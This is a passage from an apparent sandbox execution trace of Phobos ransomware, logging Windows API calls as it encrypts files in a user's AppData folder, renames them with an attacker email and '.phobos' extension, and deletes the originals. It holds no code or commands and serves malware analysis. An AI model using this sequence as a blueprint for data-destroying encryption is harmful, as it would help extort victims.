| out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0184.409] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.409] CloseHandle (hObject=0x17c) returned 1 [0184.409] CloseHandle (hObject=0x130) returned 1 [0184.409] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms")) returned 1 [0184.410] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0184.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.410] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1376) returned 1 [0184.410] CloseHandle (hObject=0x130) returned 1 [0184.410] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest")) returned 0x2020 [0184.410] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.410] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.411] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.411] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0184.411] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.411] ReadFile (in: hFile=0x130, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x560, lpOverlapped=0x0) returned 1 [0184.414] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x570, dwBufLen=0x570 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x570) returned 1 [0184.414] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x570, lpOverlapped=0x0) returned 1 [0184.414] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a68) returned 1 [0184.415] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.415] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0184.415] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.415] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0184.415] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.415] CloseHandle (hObject=0x130) returned 1 [0184.415] CloseHandle (hObject=0x17c) returned 1 [0184.415] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest")) returned 1 [0184.416] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0184.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.416] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1130328) returned 1 [0184.416] CloseHandle (hObject=0x17c) returned 1 [0184.417] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe")) returned 0x20 [0184.417] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.417] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.417] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.417] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.417] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.417] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0184.417] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.417] ReadFile (in: hFile=0x17c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x110100, lpOverlapped=0x0) returned 1 [0184.422] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100, dwBufLen=0x110100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100) returned 1 [0184.431] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x110100, lpOverlapped=0x0) returned 1 [0184.450] ReadFile (in: hFile=0x17c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x3e58, lpOverlapped=0x0) returned 1 [0184.450] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3e60, dwBufLen=0x3e60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3e60) returned 1 [0184.451] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x3e60, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x3e60, lpOverlapped=0x0) returned 1 [0184.451] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a68) returned 1 [0184.451] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.451] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0184.451] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.451] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0184.451] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.451] CloseHandle (hObject=0x17c) returned 1 [0184.452] CloseHandle (hObject=0x130) returned 1 [0184.452] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe")) returned 1 [0184.471] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0184.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.472] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0184.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.473] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=13643) returned 1 [0184.473] CloseHandle (hObject=0x130) returned 1 [0184.474] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest")) returned 0x2020 [0184.474] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.474] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.474] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.474] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0184.474] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.475] ReadFile (in: hFile=0x130, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x354b, lpOverlapped=0x0) returned 1 [0184.475] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3550, dwBufLen=0x3550 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3550) returned 1 [0184.475] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x3550, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x3550, lpOverlapped=0x0) returned 1 [0184.476] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a68) returned 1 [0184.476] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.476] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0184.476] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.476] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0184.476] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.476] CloseHandle (hObject=0x130) returned 1 [0184.476] CloseHandle (hObject=0x17c) returned 1 [0184.476] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest")) returned 1 [0184.479] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0184.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.482] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=14512) returned 1 [0184.482] CloseHandle (hObject=0x17c) returned 1 [0184.482] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms")) returned 0x2020 [0184.482] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0184.482] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.482] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0184.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.483] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0184.483] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0184.483] ReadFile (in: hFile=0x17c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x38b0, lpOverlapped=0x0) returned 1 [0184.491] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x38c0, dwBufLen=0x38c0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x38c0) returned 1 [0184.491] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x38c0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x38c0, lpOverlapped=0x0) returned 1 [0184.493] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, 